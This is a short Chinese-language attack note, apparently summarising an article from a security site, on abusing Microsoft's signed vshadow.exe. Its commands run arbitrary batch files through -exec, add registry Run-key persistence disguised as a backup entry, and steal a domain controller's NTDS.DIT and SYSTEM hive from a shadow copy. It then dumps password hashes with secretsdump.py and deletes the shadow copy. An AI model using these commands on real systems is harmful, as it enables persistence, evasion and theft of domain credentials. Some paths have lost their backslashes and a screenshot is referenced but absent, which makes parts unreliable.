本文根据嘶吼学习总结出文中几种方式
Vshadow包含在window SDK中,由微软签名。
Vshadow包括执行脚本和调用支持卷影快照管理的命令的功能,这些功能可能会被滥用于特权级的防御规避,权限持久性和文件提取。
命令执行
vshadow执行命令使用-exec参数该参数可以执行二进制文件(exe)或(.bat / .cmd),-exec不支持命令参数,因此有效执行需要在这些限制的某些中进行包装。
vshadow.exe -nw -exec=<\path\to\exe> <system drive>
vshadow.exe -nw -exec=c:\1.bat c:
自动启动持久性和防御逃避
通过输入以下命令为我们的有效的添加持久性(通过注册表运行密钥):
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "C:\Program Files\Microsoft\VSSSDK72\Tools\VSSReports\vshadow.exe -nw -exec=c:\1.bat c:"
敏感文件提取– AD数据库
先执行vshadow.exe -p -nw c:
由于ntds在C:WINDOWSNTDSNTDS.DIT
执行完之后会展开
然后在利用图中指出地址代表C:盘符进行ntds数据库的复制
再利用reg导出HKLMSYSTEM的信息
最后利用impacket里面的secretsdump.py读取哈希
secretsdump.py -ntds ntds.dit.bak -system system.bak LOCAL 删除卷影集
vshadow -dx={前面记录下来的号码}